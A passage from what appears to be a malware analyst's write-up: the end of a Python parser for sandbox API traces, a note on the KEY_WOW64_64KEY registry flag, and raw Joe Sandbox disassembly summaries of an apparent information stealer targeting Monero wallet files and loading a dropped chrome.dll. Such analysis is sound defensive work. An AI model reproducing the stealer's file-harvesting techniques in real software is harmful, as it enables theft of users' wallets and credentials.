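        "args": [a.strip() for a in args.split(",")] if args is not None else [],
        "ref": m.group("ref"), "subcall": m.group("sub"), "notes": [],
    }


def annotate(rec):
    api, args = rec["api"], rec["args"]
    ints = [arg_int(a) for a in args]
    if api.startswith("RegOpenKeyEx") and len(ints) >= 4:
        root = HKEY_ROOTS.get(ints[0], "hKey=%s (runtime handle)" % args[0])
        rec["notes"].append("root=%s access=%s" % (root, decode_reg_access(ints[3])))
    elif api == "ShellExecuteEx" and ints and ints[0] is not None:
        kind = "32-bit SHELLEXECUTEINFO" if ints[0] == SIZEOF_SHELLEXECUTEINFO32 else "unexpected"
        rec["notes"].append("cbSize=%d (%s)" % (ints[0], kind))
    elif api == "GetProcessHeap" and len(ints) >= 2 and ints[1] is not None:
        # Inference, not stated by the report: GetProcessHeap takes no parameters,
        # so the two slots shown are the Flags and Size already on the stack for
        # the RtlAllocateHeap call that follows it; 0x104 is an ANSI MAX_PATH buffer.
        tag = " (MAX_PATH)" if ints[1] == MAX_PATH else ""
        rec["notes"].append("next RtlAllocateHeap size=%d%s" % (ints[1], tag))
    return rec


def analyze(lines):
    """Parse every API line, skipping headers such as 'Memory Dump Source'."""
    return [annotate(r) for r in map(parse_api_line, lines) if r is not None]


# Lines copied from this report section, plus one non-API header line.
SAMPLE_LINES = [
    "• RegOpenKeyExA.ADVAPI32(80000001,0131DBE0,00000000,00020119,?), ref: 00A44344",
    "• RegQueryValueExA.ADVAPI32(?,0131ED00,00000000,00000000,00000000,000000FF), ref: 00A44368",
    "• RegCloseKey.ADVAPI32(?), ref: 00A44372",
    "• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47FC7",
    "• RtlAllocateHeap.NTDLL(00000000), ref: 00A47FCE",
    "• RegOpenKeyExA.ADVAPI32(80000002,0130BBB0,00000000,00020119,?), ref: 00A47FEE",
    "• Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\\Monero\\wallet.keys,00A50E1A), ref: 00A4ACD5",
    "• ShellExecuteEx.SHELL32(0000003C), ref: 00A42FD5",
    "• wsprintfA.USER32 ref: 00A49457",
    "• ExitProcess.KERNEL32 ref: 00A469F5",
    "Memory Dump Source",
]

if __name__ == "__main__":
    for rec in analyze(SAMPLE_LINES):
        print(rec["ref"], rec["api"], rec["notes"])
```

The `KEY_WOW64_64KEY` bit is the detail worth keeping: without it a 32-bit process reading under HKLM\SOFTWARE is silently redirected to the Wow6432Node view, so a stealer that wants the 64-bit application's install paths has to ask for it explicitly, and that flag is a cheap thing to look for when triaging other 32-bit samples' registry calls.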
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Type
                                      • String ID:
                                      • API String ID: 2109742289-3916222277
                                      • Opcode ID: 08c7be4d95b742f8bc4fd1b242f7d9d6f7a910ad30feb79c23e7c88fd13117fe
                                      • Instruction ID: 204844e189f6857a2a967e25424e296b44eb14de1e55ec1430b7f550f643d087
                                      • Opcode Fuzzy Hash: 08c7be4d95b742f8bc4fd1b242f7d9d6f7a910ad30feb79c23e7c88fd13117fe
                                      • Instruction Fuzzy Hash: F941F8B410079C9EDB318B248DC5FFB7BF8AB85718F1444E8E98E97182D2719A45DF60
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A46903
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A469C6
                                      • ExitProcess.KERNEL32 ref: 00A469F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: aa3d735ee3229cda854251ddfa035fc0507d8028f4c8dbcb4cdbaa8e3d6d0972
                                      • Instruction ID: 156230eb2e858bc3989583fa0129257a9aae71cfe165f6cbfeb68b259685ba33
                                      • Opcode Fuzzy Hash: aa3d735ee3229cda854251ddfa035fc0507d8028f4c8dbcb4cdbaa8e3d6d0972
                                      • Instruction Fuzzy Hash: 1F314FB5D01218ABDB14EB90DD95FDEB778EF54300F404188F209A6191DF746B49CF69
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A50E10,00000000,?), ref: 00A489BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A489C6
                                      • wsprintfA.USER32 ref: 00A489E0
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: a2592884f8ec07768532991c98ae923a318c76c32f71ea3d75375e0eba8f6ffd
                                      • Instruction ID: 8daeafeb11db89fe19edc7f818894f88a084ac4d04f7d681e339fae2746afe36
                                      • Opcode Fuzzy Hash: a2592884f8ec07768532991c98ae923a318c76c32f71ea3d75375e0eba8f6ffd
                                      • Instruction Fuzzy Hash: 7621E5B1E44304AFDB00DFA4DD45FAEBBB8FB48711F104519FA19AB280C775A9008BB5
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A3A098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: a51951d8b5cf16575cda12a506f9f3bc131f31e4adde8d397553db0d11bc7c38
                                      • Instruction ID: d87a7f7a9e00d9ccab6dff474742bad691f950f8e2e2de0eb9644d3c8fc67f30
                                      • Opcode Fuzzy Hash: a51951d8b5cf16575cda12a506f9f3bc131f31e4adde8d397553db0d11bc7c38
                                      • Instruction Fuzzy Hash: 68F0E270E89314BEDA00EB60EC44BA63274B316305F104A29F409DF3A0D6B5A888CA66
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A496AE,00000000), ref: 00A48EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A48EF2
                                      • wsprintfW.USER32 ref: 00A48F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 61f32c6169ed0533be7d33baa1e35c6be4251076f373176e3b2d35275f47bb66
                                      • Instruction ID: f21802da160e2244e5f64cb2ff74f380132ac2ea6af2834e02e4e44519936371
                                      • Opcode Fuzzy Hash: 61f32c6169ed0533be7d33baa1e35c6be4251076f373176e3b2d35275f47bb66
                                      • Instruction Fuzzy Hash: 4DE0B675E48309BBDB10DBA4DD0AE6977A8EB05702F000194FD0DDA380DA71AE109BA5
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00A3AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00A3ADEC
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3AE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 66a32a7e79fd2015706ff608f24aaf482f980c01017e611c75900611b2677439
                                      • Instruction ID: 76592720561aea1d865fd4bda757224b4b7dde5f7843da7ed9dcf4104979e7fd
                                      • Opcode Fuzzy Hash: 66a32a7e79fd2015706ff608f24aaf482f980c01017e611c75900611b2677439
                                      • Instruction Fuzzy Hash: FFE11E76D505189BDB04EBA4DEA2EEE7339AFA4301F408598F11676191EF306E0DCB72
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D581
                                      • lstrlen.KERNEL32(00000000), ref: 00A3D798
                                      • lstrlen.KERNEL32(00000000), ref: 00A3D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: fd39094401a14b6cf6bd71e91b2eda70f37f1d5782d66d2b610cc05cb9593d9c
                                      • Instruction ID: 4549f5567d8e4c58160b21b47b92ebd955c124db9bb94087beb5e8d6af69736f
                                      • Opcode Fuzzy Hash: fd39094401a14b6cf6bd71e91b2eda70f37f1d5782d66d2b610cc05cb9593d9c
                                      • Instruction Fuzzy Hash: 86911076D505189BDB04FBA0DEA2EEE7339EFA4340F404568F516A6191EF306E09CB72
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D901
                                      • lstrlen.KERNEL32(00000000), ref: 00A3DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00A3DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 6a3a98a6a781fff53ffe94702546b5ce9702adbb0c0a44eade1f03902d8e6cdb
                                      • Instruction ID: 8eb93a0ac589dd38bf4901e70c6ac4ad72c97266b1121d3700c863f992830512
                                      • Opcode Fuzzy Hash: 6a3a98a6a781fff53ffe94702546b5ce9702adbb0c0a44eade1f03902d8e6cdb
                                      • Instruction Fuzzy Hash: 5A812D76D505189BDB04FBA4DEA2EEE7339BFA4340F404568F506A6191EF306E09CB72
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 0adf0dc0f9f49bd4a8a263ffcb3aa8eaeeddc5f6fafb2bd60656c544eba543ec
